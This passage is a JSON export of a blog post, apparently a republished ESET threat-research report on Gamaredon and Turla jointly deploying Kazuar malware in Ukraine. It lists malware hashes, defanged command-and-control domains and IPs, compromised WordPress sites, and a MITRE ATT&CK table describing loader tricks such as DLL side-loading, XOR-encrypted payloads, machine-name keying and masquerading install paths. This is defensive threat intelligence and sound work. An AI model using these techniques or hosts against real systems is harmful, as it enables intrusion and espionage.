monospace;\">371AB9EB2A3DA44099B2<wbr\/>B7716DE0916600450CFD<\/span><\/td>\n<td width=\"123\"><span style=\"font-family: courier new, courier, monospace;\">ekrn.ps1<\/span><\/td>\n<td width=\"180\">PowerShell\/Turla.AJ<\/td>\n<td width=\"161\">Kazuar v2 installer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">4A58365EB8F928EC3CD6<wbr\/>2FF59E59645C2D8C0BA5<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">MSIL\/Turla.W<\/td>\n<td width=\"161\">Kazuar v2.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">214DC22FA25314F9C0DD<wbr\/>A54F669EDE72000C85A4<\/span><\/td>\n<td width=\"123\"><span style=\"font-family: courier new, courier, monospace;\">Sandboxie.vbs<\/span><\/td>\n<td width=\"180\">VBS\/Turla.C<\/td>\n<td width=\"161\">Kazuar v2 installer \u2013 VBScript variant.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Network<\/h3>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"147\"><strong>IP<\/strong><\/td>\n<td width=\"136\"><strong>Domain<\/strong><\/td>\n<td width=\"113\"><strong>Hosting provider<\/strong><\/td>\n<td width=\"85\"><strong>First seen<\/strong><\/td>\n<td width=\"161\"><strong>Details<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"147\">N\/A<\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">lucky-king-96d6.mop<wbr\/>ig92456.workers[.]dev<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"85\">2025\u201102\u201128<\/td>\n<td width=\"161\">Cloudflare worker found in payloads downloaded by PteroOdd.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">64.176.173[.]164<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">eset.ydns[.]eu<\/span><\/td>\n<td width=\"113\">The Constant Company, LLC<\/td>\n<td width=\"85\">2025\u201103\u201101<\/td>\n<td width=\"161\">C&amp;C server found in payloads downloaded by PteroOdd.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">85.13.145[.]231<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">hauptschule-schw<wbr\/>albenstrasse[.]de<\/span><\/td>\n<td width=\"113\">Neue Medien Muennich GmbH<\/td>\n<td width=\"85\">2024\u201106\u201106<\/td>\n<td width=\"161\">Compromised WordPress site used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">91.231.182[.]187<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">ekrn.ydns[.]eu<\/span><\/td>\n<td width=\"113\">South Park Networks LLC<\/td>\n<td width=\"85\">2025\u201106\u201105<\/td>\n<td width=\"161\">C&amp;C server in payloads downloaded by PteroPaste.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">185.118.115[.]15<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">fjsconsultoria[.]com<\/span><\/td>\n<td width=\"113\">Dream Fusion &#8211; IT Services, Lda<\/td>\n<td width=\"85\">2024\u201106\u201126<\/td>\n<td width=\"161\">Compromised WordPress site used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">77.46.148[.]242<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">ingas[.]rs<\/span><\/td>\n<td width=\"113\">TELEKOM SRBIJA a.d.<\/td>\n<td width=\"85\">2024\u201106\u201103<\/td>\n<td width=\"161\">Compromised WordPress site used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">168.119.152[.]19<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">abrargeospatial[.]ir<\/span><\/td>\n<td width=\"113\">Hetzner Online GmbH<\/td>\n<td width=\"85\">2023\u201111\u201113<\/td>\n<td width=\"161\">Compromised WordPress site used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">217.160.0[.]33<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">www.brannenburg<wbr\/>er-nagelfluh[.]de<\/span><\/td>\n<td width=\"113\">IONOS SE<\/td>\n<td width=\"85\">2019\u201106\u201106<\/td>\n<td width=\"161\">Compromised WordPress site used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">217.160.0[.]159<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">www.pizzeria-mercy[.]de<\/span><\/td>\n<td width=\"113\">IONOS SE<\/td>\n<td width=\"85\">2023\u201110\u201105<\/td>\n<td width=\"161\">Compromised WordPress site used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>MITRE ATT&amp;CK techniques<\/h2>\n<p>This table was built using <a href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">version 17<\/a> of the MITRE ATT&amp;CK framework<strong>.<\/strong><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"113\"><strong>Tactic<\/strong><\/td>\n<td width=\"113\"><strong>ID<\/strong><\/td>\n<td width=\"151\"><strong>Name<\/strong><\/td>\n<td width=\"265\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td rowspan=\"5\" width=\"113\"><strong>Resource Development<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1583\/001\" target=\"_blank\" rel=\"noopener\">T1583.001<\/a><\/td>\n<td width=\"151\">Acquire Infrastructure: Domains<\/td>\n<td width=\"265\">Gamaredon or Turla registered a domain at a free dynamic DNS provider.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1583\/004\" target=\"_blank\" rel=\"noopener\">T1583.004<\/a><\/td>\n<td width=\"151\">Acquire Infrastructure: Server<\/td>\n<td width=\"265\">Gamaredon or Turla rented a server at Vultr.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1583\/007\" target=\"_blank\" rel=\"noopener\">T1583.007<\/a><\/td>\n<td width=\"151\">Acquire Infrastructure: Serverless<\/td>\n<td width=\"265\">Gamaredon created Cloudflare workers and Telegra.ph pages.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1584\/003\" target=\"_blank\" rel=\"noopener\">T1584.003<\/a><\/td>\n<td width=\"151\">Compromise Infrastructure: Virtual Private Server<\/td>\n<td width=\"265\">Turla compromised WordPress websites.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1608\/\" target=\"_blank\" rel=\"noopener\">T1608<\/a><\/td>\n<td width=\"151\">Stage Capabilities<\/td>\n<td width=\"265\">Turla staged Kazuar installer scripts on its C&amp;C servers.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Execution<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1059\/001\" target=\"_blank\" rel=\"noopener\">T1059.001<\/a><\/td>\n<td width=\"151\">Command and Scripting Interpreter: PowerShell<\/td>\n<td width=\"265\">PteroGraphin is developed in PowerShell.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Persistence<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1574\/002\" target=\"_blank\" rel=\"noopener\">T1574.002<\/a><\/td>\n<td width=\"151\">Hijack Execution Flow: DLL Side-Loading<\/td>\n<td width=\"265\">Kazuar loaders use DLL side-loading.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>Defense Evasion<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1140\" target=\"_blank\" rel=\"noopener\">T1140<\/a><\/td>\n<td width=\"151\">Deobfuscate\/Decode Files or Information<\/td>\n<td width=\"265\">The Kazuar payload is XOR encrypted and all Kazuar strings are encrypted via substitution tables.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1480\/001\" target=\"_blank\" rel=\"noopener\">T1480.001<\/a><\/td>\n<td width=\"151\">Execution Guardrails: Environmental Keying<\/td>\n<td width=\"265\">Kazuar loaders decrypt the payloads, using the machine name as the key.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1036\/005\" target=\"_blank\" rel=\"noopener\">T1036.005<\/a><\/td>\n<td width=\"151\">Masquerading: Match Legitimate Name or Location<\/td>\n<td width=\"265\">Kazuar loaders are located in legitimate-looking directories such as <span style=\"font-family: courier new, courier, monospace;\">C:\\Program Files (x86)\\Brother Printer\\App\\<\/span> or <span style=\"font-family: courier new, courier, monospace;\">%LOCALAPPDATA%\\Programs\\Sony\\Audio\\<wbr\/>Drivers\\<\/span>.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\" width=\"113\"><strong>Discovery<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1057\/\" target=\"_blank\" rel=\"noopener\">T1057<\/a><\/td>\n<td width=\"151\">Process Discovery<\/td>\n<td width=\"265\">The PowerShell script starting Kazuar v3 sends the list of running processes to its C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1012\/\" target=\"_blank\" rel=\"noopener\">T1012<\/a><\/td>\n<td width=\"151\">Query Registry<\/td>\n<td width=\"265\">The PowerShell script starting Kazuar v3 gets the PowerShell version from the registry.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1082\/\" target=\"_blank\" rel=\"noopener\">T1082<\/a><\/td>\n<td width=\"151\">System Information Discovery<\/td>\n<td width=\"265\">The PowerShell script starting Kazuar v3 exfiltrates the last boot time, OS version, and OS architecture.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1083\/\" target=\"_blank\" rel=\"noopener\">T1083<\/a><\/td>\n<td width=\"151\">File and Directory Discovery<\/td>\n<td width=\"265\">The PowerShell script starting Kazuar v3 lists files in the directories <span style=\"font-family: courier new, courier, monospace;\">%TEMP%<\/span> and <span style=\"font-family: courier new, courier, monospace;\">%APPDATA%\\Microsoft\\Windows<\/span>.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>Command and Control<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1071\/001\" target=\"_blank\" rel=\"noopener\">T1071.001<\/a><\/td>\n<td width=\"151\">Application Layer Protocol: Web Protocols<\/td>\n<td width=\"265\">PteroGraphin and Kazuar use HTTPS.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1573\/001\" target=\"_blank\" rel=\"noopener\">T1573.001<\/a><\/td>\n<td width=\"151\">Encrypted Channel: Symmetric Cryptography<\/td>\n<td width=\"265\">PteroGraphin decrypts the C&amp;C reply using 3DES.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1102\/\" target=\"_blank\" rel=\"noopener\">T1102<\/a><\/td>\n<td width=\"151\">Web Service<\/td>\n<td width=\"265\">Legitimate web services, such as Telegra.ph, were used in this campaign.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=gamaredon-x-turla-collab&amp;sfdccampaignid=7011n0000017htTAAQ\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/eti-eset-threat-intelligence.png\" alt=\"\" width=\"915\" height=\"296\"\/><\/a><\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>In this blogpost, we uncover the first known cases of collaboration between Gamaredon and Turla, in Ukraine. Key<\/p>\n","protected":false},"author":1,"featured_media":242,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-241","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/posts\/241","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/comments?post=241"}],"version-history":[{"count":0,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/posts\/241\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/media\/242"}],"wp:attachment":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/media?parent=241"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/categories?post=241"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/tags?post=241"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}